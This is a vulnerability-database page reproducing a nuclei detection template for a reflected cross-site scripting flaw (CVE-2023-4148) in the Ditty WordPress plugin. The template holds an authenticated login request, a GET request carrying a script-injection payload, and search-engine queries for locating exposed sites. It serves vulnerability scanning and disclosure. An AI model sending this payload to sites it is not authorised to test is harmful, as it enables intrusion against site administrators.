Lucene search
K

Ditty < 3.1.25 - Cross-Site Scripting

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Ditty < 3.1.25 - Cross-Site Scripting, Reflected XSS vulnerabilit

Related
Refs
Code
id: CVE-2023-4148

info:
  name: Ditty < 3.1.25 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through unsanitized parameters and generated URLs to steal session cookies from high-privilege users including WordPress administrators.
  remediation: Fixed in version 3.1.25
  reference:
    - https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4148
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4148
    cwe-id: CWE-79
    epss-score: 0.00812
    epss-percentile: 0.52374
    cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: metaphorcreations
    product: ditty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/
    fofa-query: body=/wp-content/plugins/ditty-news-ticker/
    publicwww-query: /wp-content/plugins/ditty-news-ticker/
  tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"><script>alert(/XSS/)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty")'
          - 'contains(content_type_2, "text/html")'
        condition: and
# digest: 4b0a00483046022100d8c292f968605e1c51948ebc8782f4f47c1bf7e0daa26f702ab52577254f11b6022100fc83f06d7a69f611b0749d4f2a20721d58872e5058765fd545460707552000d5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
EPSS0.00812
SSVC
26